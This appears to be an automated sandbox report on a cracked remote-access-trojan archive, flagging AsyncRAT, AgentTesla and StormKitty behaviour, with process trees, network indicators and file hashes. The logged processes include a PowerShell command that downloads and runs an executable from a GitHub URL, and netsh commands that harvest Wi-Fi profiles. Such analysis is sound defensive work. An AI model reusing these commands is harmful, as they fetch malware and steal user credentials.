Analysis Overview
SHA256
54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff
Threat Level: Known bad
The file S500 RAT Cracked + Source .rar was found to be: Known bad.
Malicious Activity Summary
Async RAT payload
Arrowrat family
Agenttesla family
StormKitty payload
AgentTesla payload
Stormkitty family
AsyncRat
Asyncrat family
StormKitty
Async RAT payload
Blocklisted process makes network request
Reads user/profile data of web browsers
Obfuscated with Agile.Net obfuscator
UPX packed file
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Looks up geolocation information via web service
Drops desktop.ini file(s)
Looks up external IP address via web service
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-30 13:55
Signatures
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Agenttesla family
Arrowrat family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Asyncrat family
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stormkitty family
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-30 13:53
Reported
2024-03-30 14:46
Platform
win7-20240221-en
Max time kernel
1561s
Max time network
1573s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2804 wrote to memory of 2896 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 2804 wrote to memory of 2896 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 2804 wrote to memory of 2896 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-30 13:53
Reported
2024-03-30 14:18
Platform
win10-20240221-en
Max time kernel
164s
Max time network
169s
Command Line
Signatures
AsyncRat
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | icanhazip.com | N/A | N/A |
Looks up geolocation information via web service
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Internet Explorer\TypedURLs | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe"
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B6D8.tmp\B6D9.tmp\B6E9.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
ServerRegistrationManager.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"
C:\Windows\system32\taskhostw.exe
taskhostw.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.110.86.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | icanhazip.com | udp |
| US | 104.16.184.241:80 | icanhazip.com | tcp |
| US | 8.8.8.8:53 | api.mylnikov.org | udp |
| US | 104.21.44.66:443 | api.mylnikov.org | tcp |
| US | 8.8.8.8:53 | 241.184.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 66.44.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp |
Files
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe
| MD5 | 87ca06f69c513f4fbbf67c5b4e366210 |
| SHA1 | 7a0383ddd6f8ec2ec8624358ed0cd2ddc1a366aa |
| SHA256 | 42b6ecf01da5fc49e5d12229a52ddeb9901b13d62ac00a846aa748adb083f8e5 |
| SHA512 | 286f3e8d46fe798b1e37823caea0e28811fb2e42a8e27669622a6477c353a7fe56f8e207ac9aa199df4ceac39ec9fd7bd77bdf01deac8ef448269916457d4acb |
memory/3608-460-0x0000000000860000-0x0000000000988000-memory.dmp
memory/3608-462-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp
memory/3608-463-0x000000001B6F0000-0x000000001B700000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe
| MD5 | 604f8eb4afe0d9a9e3fb5f7981c09145 |
| SHA1 | 92d44f43b4c9fc84b99ba34c5abb3672725ecc69 |
| SHA256 | 682e2204557a05cddbaddef019cbc2eda6eaa50007f20851eadb9a33c35c458d |
| SHA512 | cf35e1559004f48ed1ffbf5b78ae19861afb8e19a9979a49294da60f0f83ef7428bd3b5d09b869c6ce556141938d0d387deb350b10c0c9ca58087d384e4d3598 |
memory/4148-466-0x0000000000890000-0x00000000008C2000-memory.dmp
memory/4148-467-0x0000000073270000-0x000000007395E000-memory.dmp
memory/4148-468-0x0000000005200000-0x0000000005210000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
| MD5 | 5b52658c4517684971de10a6b7a67c30 |
| SHA1 | f0820c52617ebacaf53d8b8d97f1a42c712888bd |
| SHA256 | 3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31 |
| SHA512 | ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6 |
memory/4604-471-0x0000000000400000-0x0000000000439000-memory.dmp
memory/3608-474-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B6D8.tmp\B6D9.tmp\B6E9.bat
| MD5 | fc4af7384f0b6f274dd3e745f0aceeaa |
| SHA1 | 31b310f869b15b84e52ef282cabaee974e5043cf |
| SHA256 | f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34 |
| SHA512 | dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f |
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
| MD5 | aa2fc72b58059e5e7e9e7003ab466322 |
| SHA1 | e171576589134431baccb40d308e7dcbc776e087 |
| SHA256 | f107c0f275bd1c773e1ff2d78b60a4060b8353b02f45d3892968206fedffdf88 |
| SHA512 | 26d69ad0d3f41bf08585307595e1d670c7d7905e1f86a566a36d9b0c836d3b349a6349e1f2885d433d35bd111f95ce004ae34e81443f96b73e784db3594e3eef |
memory/3768-478-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp
memory/3768-479-0x0000026137C60000-0x0000026138D24000-memory.dmp
memory/3768-480-0x000002613AB40000-0x000002613AB50000-memory.dmp
memory/3768-482-0x00000261535E0000-0x00000261537D2000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\Guna.UI2.dll
| MD5 | 0f07705bd42d86d77dab085c42775244 |
| SHA1 | 7e4b5c367183f4753a8d610e353c458c3def3888 |
| SHA256 | cf9b66e11506fa431849350c0cb58430a71e5ec943d2db9ef1b2e2302f299443 |
| SHA512 | 851b1a4c470ee7fe07ce5619c16fd391428585926c5b559694a9e445633ea51ec86c74a3bbf3bce39d943c4bf714dad2fd3c4a4d0703be2333541c79a2ee97f0 |
C:\Users\Admin\AppData\Local\Temp\c6ef4c2b-9a55-40b4-957b-c3cb74191397\GunaDotNetRT64.dll
| MD5 | 9c43f77cb7cff27cb47ed67babe3eda5 |
| SHA1 | b0400cf68249369d21de86bd26bb84ccffd47c43 |
| SHA256 | f25b9288fe370dcfcb4823fb4e44ab88c7f5fce6e137d0dba389a3dba07d621e |
| SHA512 | cde6fb6cf8db6f9746e69e6c10214e60b3646700d70b49668a2a792e309714dd2d4c5a5241977a833a95fcde8318abcc89eb9968a5039a0b75726bbfa27125a7 |
memory/3768-490-0x00007FF9B6F10000-0x00007FF9B703C000-memory.dmp
memory/3768-491-0x00007FF9B6EB0000-0x00007FF9B6ED7000-memory.dmp
memory/3768-493-0x0000026153C20000-0x0000026153E60000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.dll
| MD5 | af527b22b92a23c38a492c5961cf2643 |
| SHA1 | 15106adfa13415287b3e9d8deba21df53cb92eda |
| SHA256 | 4208c9293c5684d2fc3c8f5a269a1120adee32fbd2766bbb73410aab2d491b7a |
| SHA512 | 543cce9b5e4c9558bf0bd0da9d6af8c1ad2f7d62e2d65a9aa4e3af9e4840ce6fb6bbe8952bd20f6f1e3a6d3b5e5e5b3417a60b6d955bfa4e23a653262677b49c |
memory/4148-494-0x0000000005380000-0x00000000053E6000-memory.dmp
memory/3768-495-0x000002613AB40000-0x000002613AB50000-memory.dmp
memory/4604-496-0x0000000000400000-0x0000000000439000-memory.dmp
memory/3768-497-0x000002613AB40000-0x000002613AB50000-memory.dmp
memory/3768-498-0x000002613AB40000-0x000002613AB50000-memory.dmp
memory/3768-499-0x0000026153BE0000-0x0000026153C12000-memory.dmp
memory/3768-500-0x000002613AB40000-0x000002613AB50000-memory.dmp
memory/4148-501-0x0000000073270000-0x000000007395E000-memory.dmp
memory/3768-502-0x000002613AB40000-0x000002613AB50000-memory.dmp
memory/4148-503-0x0000000005200000-0x0000000005210000-memory.dmp
memory/3768-504-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stage2.asm
| MD5 | e03eaf459f028cc6fa8669e277c1a17a |
| SHA1 | ea0a775e49e279208962a9179c974969a2cf7e5e |
| SHA256 | a32a88946334b5f32fe890fcb104b090dd38cb32ef7948f5b8382bcc2d8da61f |
| SHA512 | 17efa3673568cc44f9ef8b925bd133e1bf69851cfcbac2888db5a3a7b522c15be0d6155b4311c704355be086cfd809547628d3cb963449e4bd277fc2682d895d |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\PebApi.asm
| MD5 | be38b0526e6d40f44c7b62d8db2c9553 |
| SHA1 | 5c4c70ae1381b5e51a685f96700340832229c06d |
| SHA256 | f1eaa5bd68ac32d37066ba1cb83d1349526df1558d7cf0767950760f442f788f |
| SHA512 | 77ba15f77a94afe24ef725a54dbefbc83894981b34fac4002e2b50bc22336d40fb371ded8db2bab3b68e76e182f552121fd443ff34211b3f96fce393e7c113ac |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Melt.asm
| MD5 | 78f905ea7378410c450c79ceb3b9012b |
| SHA1 | 495f677fd305c78a77e8164f7de7d732e1aca35c |
| SHA256 | 50156675295081d268576f77201b4f78bb466446e18ca4af410833f16de7646a |
| SHA512 | ae549f79413222a81e9b2082f3ea287ee8a34626a43bfb43c29bfb2504324620740dae465263fa280ada6450895fe856512b38b94455b058022a143e2a6583f5 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Emulator.asm
| MD5 | 1efa2056cd994a29fd0d2e983ef7b26e |
| SHA1 | 76967624574c43b1e22e9b3ec4ba17139b547633 |
| SHA256 | 1e832c97029620e75e6f8a053d3ec90750e7f5857803ebce82526bfa9ec39e9d |
| SHA512 | edccae7798df98b6ed9ed3ec7fbc09acd7aeafd700704383b7e065ae2c155afc50854b21b0fd2fa20de2c0efbc674079fe9463744789b109e23ae840fa7c4ac2 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\register.txt
| MD5 | e9f329a48dcb70c6ad95c8ab8fe82eb0 |
| SHA1 | 45e25355e67fd2d528467b4117884ffb601552a3 |
| SHA256 | 5dd46720271713bdef9edafe9058dbee1a10003dea7cac4cb5cdb53d68a3a637 |
| SHA512 | 62648e1f40ff46f54921adfd928b7cae29a9bd9778e0334b80ca593e9afbcdc287c1e7df5afa08cb44fa97cfcdd164216c4adb9566af146ac00da6fbb3e8cad4 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop_minimal.txt
| MD5 | 963be96779d4ef26360c2a3af3a53816 |
| SHA1 | 6991959998c9939e5ededa0d6759a715559c2140 |
| SHA256 | f639582a95112fc90e21e63757e8814f957cb597fbc18d15603e433bf551aaf4 |
| SHA512 | 4525ce17036d54504143b39eb5a1a7ee1b6abe4f42ebca82c78d66d387f68f427595e73705f19ed0b61cc12c4cd473b84b3e7d87290deb8bf8a86eb904b520b0 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop.txt
| MD5 | f7bbcdd86cbc1d6d0b81720ac1477fde |
| SHA1 | 4799c37f86be4dda105ed3468934f70c36339474 |
| SHA256 | 50f8cecbfc4491bb320692efbc0003b045760683bb63913fd42152dafc0c922f |
| SHA512 | 2a49ee7b7fe7b6e319455f9f9dde0906187dac60076ad83e161ef68a91319827183af0f1ae48b6e6e656419a9cb5029a29591e15083da8f113660724863445c2 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stub.asm
| MD5 | a54153cd522d951f6b360c3bd3de84d0 |
| SHA1 | 639dbc414f495044c2d705f39ac965212f1c8c30 |
| SHA256 | 195e94c80f787fa5e24168c46fe392d2710e9c6e4b25b31ed73201c3d2bc93fa |
| SHA512 | 95e49e83a69e5480cc2eda09e9124236a5a10af2c99795825b001005d0dd0806cf203e93cdf7459101c082b198d9c1c6078d6bbf8075d33818b87f7e7e1ae5e3 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Download.asm
| MD5 | e6fad395145548f21929c4050a70d710 |
| SHA1 | 97a8780b8a3d25185f83f88c5f320384b4069601 |
| SHA256 | c0a37c88fd96703c0e1f8779143bb22471d7eaea8ec05d2892feed5cd15dcf92 |
| SHA512 | 857035df11651a57af93af57fc2e4728afe99016479a508fdbb7bc1f6ea1c9305e32939533aed86bdabd2a1b190b9e8b0c1d1c62b0194902e068e35d40167799 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Compression.asm
| MD5 | feb8d2de1663adc1e141b8f7bb95d6ac |
| SHA1 | a9b1c4d0f522515c940a80876876d782510cb421 |
| SHA256 | ac2add960f9b626020137271676a37d6185b05c55000d2f0858f7e788e0ab37b |
| SHA512 | af139097158c44b5feb297655dcc925fffe95acf9f2cf2248e46e3538b94a2e5f84caa01f4c1a6d0166d9fa258a2052c49e673b6ee9566ba7625f4733c6487a3 |
C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt
| MD5 | 531208ea558a68c95339bea9517845c3 |
| SHA1 | 95865bbeb196cf007626c92cdef1524c9b16dc5a |
| SHA256 | dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a |
| SHA512 | 46f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3 |
C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt
| MD5 | d5b77dfb5f248f3aabc560d8300088c5 |
| SHA1 | bbf7bb5f78051a59e725920cea3d54d1e7473cea |
| SHA256 | 113a6f39d02edb55049baa38c50d26579247acb7427e7494805a91e415e21a55 |
| SHA512 | 180e45da4adc3643d40ded2ff526af67361f77b6c61f05d3739e10e41327614a5f57485148f32d047f6d9169230053a77c9cc6fe5e7ced2d2dc285a7b8269552 |
C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
C:\Users\Admin\Desktop\S500 RAT Cracked\initialization.dll
| MD5 | 3aaae3cec15b86693ae9fb8e1507c872 |
| SHA1 | ed8d0a139c609eb886482718ec2ecf96cbbe8c84 |
| SHA256 | a027b6b344e5a637bc8377fe58166273d2b76e92ff8c66bd505d46c21fe3b21b |
| SHA512 | 407558e01ade1832bb021b5af0209e7a6bef98ab35b9f4723a1add48362bd13f566697a8fb41af48c0bb15ca13585f9c09ac8d5da0feb322798c778b09cf4463 |
memory/3768-577-0x000002615A2B0000-0x000002615A2BC000-memory.dmp
memory/3768-579-0x000002615A2E0000-0x000002615A2F2000-memory.dmp
memory/3768-581-0x000002615A2C0000-0x000002615A2CA000-memory.dmp
